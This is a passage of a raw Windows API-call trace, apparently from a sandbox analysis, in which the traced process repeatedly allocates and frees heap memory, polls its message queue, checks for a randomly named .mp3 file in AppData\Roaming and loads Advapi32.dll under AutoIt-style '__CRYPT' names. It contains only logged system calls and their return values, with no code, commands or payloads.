RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0222.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0222.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0222.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0222.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0222.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0222.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0222.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0222.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0222.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0222.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0222.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0222.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0222.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0222.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0222.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0222.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0222.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0222.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0222.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0222.262] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0222.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0222.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0222.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0222.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0222.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0222.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0222.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0222.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0222.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0222.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0222.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0222.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0222.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0222.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0222.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0222.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0222.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0222.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0222.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0222.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0222.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0222.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0222.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0222.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0222.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0222.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0222.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0222.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0222.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0222.263] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0222.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0222.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0222.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0222.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0222.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0222.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0222.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0222.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0222.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0222.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0222.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0222.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0222.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0222.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0222.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0222.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0222.264] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0222.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0222.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0222.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0222.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0222.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0222.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0222.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0222.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0222.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0222.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0222.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0222.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0222.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0222.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0222.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0222.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0222.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0222.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0222.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0222.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0222.265] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/6KDjX0CerhkJtgMw88.mp3", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd10fad70, ftCreationTime.dwHighDateTime=0x1d5e3e1, ftLastAccessTime.dwLowDateTime=0xe84d9660, ftLastAccessTime.dwHighDateTime=0x1d5ec2d, ftLastWriteTime.dwLowDateTime=0xe84d9660, ftLastWriteTime.dwHighDateTime=0x1d5ec2d, nFileSizeHigh=0x0, nFileSizeLow=0x8343, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="6KDjX0CerhkJtgMw88.mp3", cAlternateFileName="6KDJX0~1.MP3")) returned 0xa87290 [0222.266] FindClose (in: hFindFile=0xa87290 | out: hFindFile=0xa87290) returned 1 [0222.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0222.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0222.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0222.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0222.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0222.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0222.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0222.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0222.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0222.267] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0222.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0222.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0222.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0222.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0222.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0222.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0222.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0222.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0222.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0222.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0222.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0222.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0222.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0222.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0222.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0222.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0222.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0222.267] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0222.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0222.267] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0222.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0222.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0222.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0222.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0222.268] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0222.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0222.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0222.268] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0222.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0222.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0222.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0222.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0222.268] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0222.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0222.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0222.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0222.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0222.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0222.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0222.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0222.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0222.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0222.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0222.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0222.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0222.269] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 1 [0222.269] TranslateMessage (lpMsg=0x8cf4a8) returned 0 [0222.269] DispatchMessageW (lpMsg=0x8cf4a8) returned 0x0 [0222.269] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0222.269] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0222.269] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0222.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0222.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0222.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0222.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0222.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0222.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0222.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0222.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0222.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0222.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0222.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0222.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0222.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0222.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0222.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0222.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0222.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0222.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0222.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0222.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0222.270] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0222.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0222.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0222.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0222.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0222.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0222.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0222.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0222.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0222.270] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0222.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0222.270] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0222.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0222.271] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0222.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0222.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0222.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0222.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0222.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0222.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0222.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0222.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0222.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0222.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0222.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0222.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0222.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0222.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0222.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0222.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0222.271] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0222.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0222.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0222.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0222.271] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0222.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0222.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0222.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0222.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0222.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0222.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0222.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0222.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0222.272] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0222.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0222.272] 